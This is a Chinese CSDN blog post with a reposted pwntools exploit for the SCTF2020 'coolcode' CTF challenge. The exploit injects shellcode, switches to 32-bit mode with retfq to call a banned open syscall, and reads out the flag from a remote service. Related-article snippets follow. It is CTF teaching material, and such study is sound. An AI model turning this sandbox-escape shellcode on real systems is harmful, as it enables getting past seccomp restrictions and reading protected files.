技巧篇:SCTF2020 coolcode 测信道攻击pwn题

最新推荐文章于 2024-02-10 23:54:03 发布
最新推荐文章于 2024-02-10 23:54:03 发布
阅读量808 收藏 3
点赞数
分类专栏: CTF PWN 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119944512
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏
该博客介绍了一种利用侧信道攻击的方法,通过禁用open函数并切换到32位模式来实现远程代码执行。文章中展示了如何构造payload,包括使用retfq指令进行切换,并给出了具体的Python脚本示例来执行攻击。
摘要由CSDN通过智能技术生成

**前言:第二次遇到侧信道攻击pwn题,禁用了open,同样需要切换32位使用open,随后利用retfq切换回来,进行rw。就可以了,这个不需要爆破,free为read,读取道bss段,rw即可,另一篇侧信道是强网杯的一道强网先锋:http://www.maxbos44k.top/index.php/archives/102/
http://www.maxbos44k.top/index.php/archives/103/。**

转载ChaMd5 exp:

from pwn import *
context.os = 'linux'
prog = './CoolCode'
p = remote("39.107.119.192 ", 9999)    
def add(idx, content):
    p.sendlineafter("choice :", '1')
    p.sendlineafter("Index: ", str(idx))
    p.sendafter("messages: ", content)
def show(idx):
    p.sendlineafter("choice :", '2')
    p.sendlineafter("Index: ", str(idx))
def free(idx):
    p.sendlineafter("choice :", '3')
    p.sendlineafter("Index: ", str(idx))
def exp():
    read = '''
        xor eax, eax
        mov edi, eax
        push 0x60
        pop rdx
        mov esi, 0x1010101
        xor esi, 0x1612601
        syscall
        mov esp, esi
        retfq
    '''
    open_x86 = '''
        mov esp, 0x602770
        push 0x67616c66
        push esp
        pop ebx
        xor ecx,ecx
        mov eax,5
        int 0x80
    '''
    readflag = '''
        push 0x33
        push 0x60272e
        retfq
        mov rdi,0x3
        mov rsi,rsp
        mov rdx,0x60
        xor rax,rax
        syscall
        mov rdi,1
        mov rax,1
        syscall
    '''
    readflag = asm(readflag, arch = 'amd64')
    add(-22, '\xc3')
    add(-37, asm(read, arch = 'amd64'))
    free(0)
    payload = p64(0x602710)+p64(0x23)+asm(open_x86)+readflag
    p.sendline(payload)
    p.interactive()
if __name__ == '__main__':
    exp()

jsjsj11123
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SCTF 2020 部分WEB writeup
qq_21912769的博客
07-07 678
Web CloudDisk Score: 250 flag: SCTF{47cf9489d8832e44312dssxag6f88f45736e0e9c8} https://github.com/dlau/koa-body/issues/75 http://120.79.1.217:7777/uploadfile { "files": { "file": { "name": "jankincai", "path": "./flag" } } } Upload success
sctf2018-NginxSecret:sctf2018-Nginx秘密
05-10
readme开启或者关闭docker环境docker-compose builddocker-compose up -ddocker-compose down手动开启botbot.py需要手动开启,登陆admin B3P#9!3J%#1dFp%&。拿到cookie加在py中对应的地方即可。
SCTF2020:SCTF2020
04-01
SCTF2020 SCTF2020
[BMZCTF-pwn] 41-sctf2020-coolcode
weixin_52640415的博客
02-20 543
又到不会区了,搜出来复现一下,学习学习 unsigned __int64 m1add() { int v1; // [rsp+Ch] [rbp-14h] BYREF void *s; // [rsp+10h] [rbp-10h] unsigned __int64 v3; // [rsp+18h] [rbp-8h] v3 = __readfsqword(0x28u); v1 = 0; printf("Index: "); __isoc99_scanf("%d", &v
2020 SCTF 部分WriteUp
Hk_Mayfly的博客
07-06 1489
signin 准备 signin.exe:https://wwa.lanzous.com/inIQdec11zi 程序分析 可以判断出,这个程序实际上是由Python打包成的可执行文件,且在运行这个程序时,在同目录下产生了一个tmp.dll文件,猜是程序调用某些函数的接口。 反编译 使用archive_viewer.py反编译为字节码文件 python archive_v...
SCTF2020】get_up WriteUp
古月浪子的博客
07-06 561
一道SCTF的逆向,做了很久很久才做起,唉… IDA打开,用shift+f12查找出现的字符串,再通过x交叉引用定位到主函数 根据伪代码,大概是判断我们输入的一个长度小于等于6的字符串,跟进判断函数看一看 看到32位的a-f+0-9的字符串,盲猜哈希,又因为输入的长度小于等于6,肯定能爆破出来,于是丢到cmd5网站上,解出来“sycsyc” 成功绕过第一个判断以后,下面的代码大致意思是查找.reioc段并且改为可写,然后用刚刚输入的字符串进行异或,这里用IDCPython脚本处理一下 可以看到处
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页...
java版sm4源码-SCTF2019-Write-Up:SCTF2019报道
06-04
SCTF 2019 官方 Write-Up Misc 签到 出人: XXX 解人数: 260 最终分数:71 [removed]/9j/4QBkRXhpZgAATU0AKgAAAAgABYdp... 给了个图片的base64编码,某些浏览器可能渲染会截断,本来想放hint提示浏览器问,但是...
SCTF2020 官方Write-up.pdf
07-08
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1目的解决方法。该目是一个Pwn目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解目的基本信息。目中提供了一个可执行文件pwn1,运行起来后显示...
SCTF差分晶振15013896510
06-21
SCTF差分晶振15013896510 SCTF差分晶振15013896510是一款差分晶振器件,提供了高频率稳定性和低抖动特性,适用于高速应用场景。 电气参数: * 频率:106.25、125、155.52、161.1328、187.5、312.5MHz * 频率稳定...
第七届大唐杯全国大学生移动通信5G技术大赛(145道)省赛模拟练习.doc
最新发布
05-22
HBPOD和BPOA通常是射频单元的一部分,而SCTF则涉及到传输接口。 2. **自由空间信号衰减** - **知识点**: 当无线信号在自由空间中传播时,随着频率的增加,信号强度会减少。 - **解析**: 选项D(6dB)是正确的。...
sctf2014 misc400b.rar
09-30
sctf2014 misc400b.rar
SEBA\SCTF-DL3手册(英语版)
12-02
根据给定的文件信息,我们可以深入探讨SEBA\SCTF-DL3流量计的手册,了解其技术规格、功能及应用。以下是对标、描述、标签以及部分内容的详细解析: ### 1. 通用规格 SEBA\SCTF-DL3是一款由韩国SEBA公司生产的...
基站系统工程:BBU5900与BBU39X0.pptx
05-15
《基站系统工程:BBU5900与BBU39X0的比较与解析》 在现代通信网络中,基站作为无线通信的关键设备,其性能和稳定性直接影响着通信质量。BBU(Baseband Unit)作为基站的核心部分,负责处理基带信号。...
SCTF2020 Reverse----get_up
一位非著名不专业的Re选手
02-04 624
目下载地址: 链接:https://pan.baidu.com/s/1ZMLB0lk1uh0PoD_vZiYCiw提取码:o9k8 拿到目先看下main函数 调用了两个函数,第二个函数没有被IDA正常识别,可能存在SMC 先看下sub_402700的伪代码 要求输入一个长度不超过6的字符串,还要满足sub_401DF0的校验 取到.reioc段的地址,然后进行SMC解密,解密函数为sub_402610,解密操作是异或,不过不需要关心,动态调试下就好 这里待解决的是sub_401DF0函数,进入看下.
CTF-PWN-沙箱逃脱-【侧信道爆破】(2021-蓝帽杯初赛-slient)
llovewuzhengzi的博客
02-10 1572
如果比较成功了,那么程序将进入死循环(我们可以通过time这个模块来获取时间戳的差值),比如时间超过2秒那么我们对于flag的一个字节就爆破成功,超过两秒的原因是在未出现异常时设置了持续时间3秒的接收的操作,持续三秒后时间间隔肯定大于2秒,而出现异常的也就是没进入循环的(比较错误的)会出现异常。侧信道攻击是一种非正常的攻击手段,是一种利用计算机不经意间发出的声音来判断计算机的执行情况,比如通过散热器的响声大小来判断计算机所运行程序的复杂性;此为系统的分页大小,不一定会和硬件分页大小相同。
旁路攻击(侧信道攻击
weixin_40191861的博客
07-15 525
在中,又称(英語:)是一種攻擊方式,它基於從密碼系統的物理中獲取的信息而非或是中的理論性弱點(較之例如:時間信息、功率消耗、泄露或甚是聲音可以提供額外的信息來源,這可被利用于对系统的进一步破解。某些側信道攻擊還要求攻擊者有關於密碼系統内部操作的技術性信息,不過,其他諸如差分電力分析的方法在黑盒攻擊中效果明顯。許多卓有成效的側信道攻擊基於由保罗·科切開拓的統計學方法。通过尝试破解的实例。左侧的峰值是在运行RSA迭代中没有乘法的部分时处理器的功率,右侧则是在乘法步骤中处理器的功率。
针对简单Pwn溢出的爆破
Rog's Blog
04-19 990
爆破大法好 例子:BUUCTF rip 首先得到源程序pwn1 file pwn1 checksec pwn1 啥也没有,很好 然后拖到IDA64分析一波 发现漏洞函数,地址为 0x401186 ,很好 祭出脚本,开始爆破 from pwn import * def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact
SCTF2020官方Write-up:Web安全漏洞与修复案例分析
SCTF2020官方Write-up中,参赛者们探讨了一道关于Web安全的挑战,涉及到了Node.js后端开发中的文件上传漏洞。目提供的源码显示,一个名为`uploadfile`的路由处理POST请求中的文件上传,使用了Koa框架和`crypto`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值